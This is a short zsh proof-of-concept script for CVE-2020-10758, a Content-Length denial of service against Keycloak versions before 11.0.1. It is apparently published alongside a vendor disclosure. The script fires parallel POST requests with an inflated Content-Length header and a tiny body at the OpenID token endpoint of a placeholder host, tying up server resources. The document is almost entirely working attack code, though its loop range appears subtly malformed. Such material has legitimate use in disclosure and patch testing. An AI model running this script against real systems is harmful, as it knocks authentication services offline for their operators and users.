Keycloak <v11.0.1 Content-Length DoS - CVE-2020-10758 - https://www.soluble.ai/blog/keycloak-cve-2020-10758

keycloak_dos_cve_2020_10758.zsh

#!/bin/zsh

# Keycloak Vuln disclosure: https://www.soluble.ai/blog/keycloak-cve-2020-10758
#
# LWN post about HTTP POST Content-Length DoS: https://lwn.net/Articles/418017/
#
# Original research by Wong Onn Chee in 2010: http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf

i=20
host="http://mykeycloakinstall.example:9000"

for x in {1..i}; do
  echo "sending request: ${x}" && \
  curl -X POST \
    ${host}/auth/realms/master/protocol/openid-connect/token \
    -H 'Content-Length: 99999' \
    --data-binary 'test=abc' &
done